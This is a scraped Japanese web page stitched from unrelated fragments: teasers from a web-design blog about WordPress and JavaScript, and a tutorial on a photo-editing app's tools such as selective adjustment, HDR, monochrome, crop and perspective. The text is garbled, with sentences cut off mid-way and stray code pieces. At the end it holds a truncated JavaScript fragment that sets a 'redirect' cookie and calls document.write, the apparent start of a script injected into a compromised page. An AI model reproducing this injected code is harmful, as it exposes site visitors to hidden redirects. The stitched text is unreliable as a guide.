カテゴリー一覧ページで、そのカテゴリー一覧ページに属する記事一覧を取得するためにループさせるのとは別に、タイトルやカテゴリー別にデザインを変・・・, 前回、「入力フォームを自由にカスタマイズできる「Advanced Custom Fields」」で基本的なフィールド名を出力方法を紹介したが、今度は条件分岐に関・・・, WEB制作マークアップJavaScriptJavaScriptで補色や反転色、RGBを取得する | シンプルシンプルデザイン, シンプルシンプルデザインのこと 配列とオブジェクトのリテラル記法を組み合わせた文字列をデータとして取り扱えるようにする。 'paged' => 1, これは、overflowをautoにした要素のスクロール位置を変更するサンプルです。 このブラシは見た目が強力なので、画像調整の温かさで好みの配色にならない場合に補助的に使うのがおすすめです。目のアイコンをオンにすると、適用したブラシの範囲が赤色で表示されます。, 「部分調整」は、+印をタップして、画面内の調節したい部分のポイントを追加します。ポイントを自由に配置したら、2本指で画面をつまんだり広げたりするような操作(ピンチ操作)でコントロールしたい部分の範囲を決めます。その部分は画面内の赤い領域の大きさで表示されます。, ポイントが選択されていると青く強調表示されるので、「明るさ(明)」「コントラスト(コ)」「彩度(彩)」を上下で選択し、左右のスワイプ操作で補正します。コントロールが済んだら、ポイント以外の部分をタップして、灰色で表示されたことを確認します。, 「HDR風」は、映画のワンシーンのような効果を写真にかけることができます。現実離れした雰囲気を与えられるのでおすすめです。詳細は自然、人物およびフィルターの強さを弱と強の2段階から選択できます。, 「グラマーグロー」は、輝きのある効果で夢の中のような雰囲気に仕上げることができます。「階調コントラスト」は、明部や中間調、暗部などの各パラメータをそれぞれ調整できます。 青く表示されるポイントをスワイプして位置を変えるだけでも雰囲気が変わるので、好みの画像が得られたら、効果から+印をタップし、オリジナルのフィルターとして名前をつけて保存しておくと便利です。, 「モノクロ」は、白黒写真のような編集ができます。つまみ状のアイコンをタップするとレッドやオレンジなど配色ごとに明るさやコントラストなどを調整できます。「ノワール」は暗室で作業したような雰囲気の白黒写真を疑似的に作成します。, 「切り抜き」は画面の比率(正方形や4:3あるいは16:9など)を変更したり、切り抜く範囲を選んだりできます。, 「回転」は90度単位のほか、任意の角度での反転、左右反転ができます。「射影変換」は、上下や左右方向に引き延ばしたり、圧縮されたような画像に加工するほか、画像を斜め方向や真上から眺めたような疑似画像に加工することができます。 これは、overflowをautoにした要素のスクロ・・・, 【2020年07月13日】 macOS Catalina(10.15.5) / Adobe iLLustrator 2020(24.2.1) にて動作確認済・・・, WordPressの管理画面。「投稿」や「固定ページ」の一覧は、公開日順に並んでいる。ところが、カスタム投稿を追加した場合、公開順ではなく名前順に並んでいること・・・, =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('